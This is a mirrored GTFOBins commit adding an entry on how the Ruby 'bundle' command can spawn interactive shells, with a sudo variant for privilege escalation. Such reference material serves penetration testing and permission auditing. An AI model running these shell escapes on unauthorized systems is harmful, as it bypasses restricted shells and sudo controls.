mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
parent
6a707c0132
commit
8795efe357
33
_gtfobins/bundle.md
Normal file
33
_gtfobins/bundle.md
Normal file
@ -0,0 +1,33 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||
code: |
|
||||
bundle help
|
||||
!/bin/sh
|
||||
- code: |
|
||||
export BUNDLE_GEMFILE=x
|
||||
bundle exec /bin/sh
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
touch $TF/Gemfile
|
||||
cd $TF
|
||||
bundle exec /bin/sh
|
||||
- description: This spawns an interactive shell via [`irb`](/gtfobins/irb/).
|
||||
code: |
|
||||
TF=$(mktemp -d)
|
||||
touch $TF/Gemfile
|
||||
cd $TF
|
||||
bundle console
|
||||
system('/bin/sh -c /bin/sh')
|
||||
- code: |
|
||||
TF=$(mktemp -d)
|
||||
echo 'system("/bin/sh")' > $TF/Gemfile
|
||||
cd $TF
|
||||
bundle install
|
||||
sudo:
|
||||
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||
code: |
|
||||
sudo bundle help
|
||||
!/bin/sh
|
||||
---
|
Loading…
Reference in New Issue
Block a user